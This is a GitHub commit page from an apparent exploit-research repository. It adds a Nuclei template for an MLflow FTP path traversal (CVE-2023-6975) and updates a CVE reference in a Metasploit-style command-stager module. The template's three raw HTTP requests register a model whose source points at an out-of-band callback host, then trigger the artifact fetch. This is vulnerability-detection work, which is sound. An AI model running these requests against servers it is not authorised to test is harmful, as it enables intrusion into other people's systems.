Merge pull request #9 from protectai/feb-exploit-release

Added mlflow URL parsing confusion Nuclei Template (CVE-2023-6975)
main
Marcello 2024-03-07 09:12:01 -07:00 committed by GitHub
commit 655e78ff31
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 42 additions and 1 deletions

View File

@ -0,0 +1,41 @@
id: mlflow-url-parsing-confusion-lfi
info:
name: MLflow FTP Path Traversal
author: kevin-mizu, byt3bl33d3r
severity: high
description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2023-6975
cwe-id: CWE-29
tags: mlflow,ml,cve,path-traversal
variables:
experiment_name: "{{rand_text_alpha(6)}}"
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{experiment_name}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
- |
GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

View File

@ -38,7 +38,7 @@ metadata = {
'license': 'MSF_LICENSE', 'license': 'MSF_LICENSE',
'references': [ 'references': [
{'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'}, {'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
{'type': 'cve', 'ref': 'CVE-2023-6025'} {'type': 'cve', 'ref': 'CVE-2023-31036'}
], ],
'type': 'remote_exploit_cmd_stager', 'type': 'remote_exploit_cmd_stager',
'targets': [ 'targets': [